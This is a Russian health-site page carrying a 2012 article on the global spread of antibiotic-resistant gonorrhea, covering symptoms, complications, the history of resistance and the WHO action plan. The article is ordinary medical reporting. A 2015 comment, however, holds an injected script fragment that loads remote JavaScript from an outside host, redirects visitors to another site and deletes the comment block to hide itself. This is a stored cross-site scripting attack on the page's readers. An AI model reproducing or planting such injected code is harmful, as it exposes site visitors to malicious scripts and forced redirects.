Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  В мире эпидемия гонореи! ...  >>  В мире эпидемия гонореи! Достигнет ли она России?
 
Обратная связь
 

В мире эпидемия гонореи! Достигнет ли она России?

Размер шрифта
21 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ежегодно в мире регистрируется около 106 миллионов случаев заболеваемости гонореей. По данным Всемирной организации здравоохранения (ВОЗ), возбудитель гонореи быстро приобретает устойчивость к современным антибиотикам. Неужели это начало эпидемии?

Микроорганизмы гонококки

Что такое гонорея

Гонорея – это инфекционное заболевание, которое передается половым путем. Возбудителем гонореи является гонококк.

Первые симптомы заболевания у мужчин появляются на 2-5 сутки после заражения, у женщин – на 5-10 сутки.

Гонорея начинается с небольшого жжения и зуда в области мочеиспускательного канала. Сначала появляются слизистые выделения, но уже через 2-3 дня выделения становятся слизисто-гнойными, а затем – гнойными. Мочеиспускание сопровождается резкой болью; наблюдаются частые позывы к мочеиспусканию.

Следует отметить, что в некоторых случаях гонорея протекает бессимптомно, особенно у женщин.

В чем опасность гонореи

При отсутствии лечения гонорея может стать причиной бесплодия (как у мужчин, так и у женщин), внематочной беременности, выкидыша, рождения мертвого и недоношенного ребенка и привести к повышению риска развития ВИЧ-инфекции.

При распространении гонококков на другие органы могут поражаться суставы, кожа, головной мозг, сердце и печень, а также возникнуть гонококковый конъюнктивит.

История вопроса

Поскольку гонококк является бактерией, то для лечения гонореи на протяжении многих лет используются антибиотики. Но пока врачи сражаются с бактериями с помощью антибиотиков, бактерии сражаются с врачами и создают механизмы защиты, которые позволяют им ускользнуть от действия препаратов, выработав устойчивость к антибиотикам.

Так, в 1940-х годах гонококк приобрел устойчивость к сульфаниламидам, в 1980-х – к пенициллину, тетрациклину, хлорамфениколу, эритромицину и стрептомицину, а в 2007 г. – к фторхинолонам, в т.ч. к ципрофлоксацину.

Современная ситуация

В настоящее время для лечения гонореи используются только цефалоспорины третьего поколения: цефиксим и цефтриаксон. Однако гонококк постепенно приобретает устойчивость и к этим антибиотикам. С 2006 по 2011 год устойчивость к цефиксиму увеличилась в 17 раз, а к цефтриаксону – в 10 раз.

Случаи гонореи, устойчивой к цефалоспоринам, зарегистрированы в США, Японии, Норвегии и Великобритании.

Что делать

Не стоит отчаиваться, ВОЗ разработала план действий, который не допустит распространения гонореи, устойчивой к антибиотикам. Основными положениями этого плана являются:

•    Профилактика, ранняя диагностика и правильное лечение гонореи.

•    Выявление случаев гонореи, устойчивой к антибиотикам.

•    Создание лабораторий для определения устойчивости гонококка к антибиотикам.

•    Создание новых препаратов для лечения гонореи.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Международный день НАО   Вы чешетесь из-за вашего дома   Почему если почесать, то снова чешется?   Почему кожа опять чешется после того, как вы ее почесали?  
18 марта 2013Инфекция, передаваемая половым путем, больше не лечится 12 марта 2013Лежачие полицейские помогут распознать аппендицит
 
03 сентября 2012Опасный вирус убивает стафилококк, против которого бессильны лекарства! 07 июня 2012Участились случаи гонореи, устойчивой к антибиотикам
 

Слайдшоу

1
Язык мой – друг мой. Что язык скажет о вашем здоровье?
Кто тебя укусил?! Самые опасные насекомые!
Как не стать жертвой ядовитого растения!

Тесты

Я и моя защита от инфекций
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.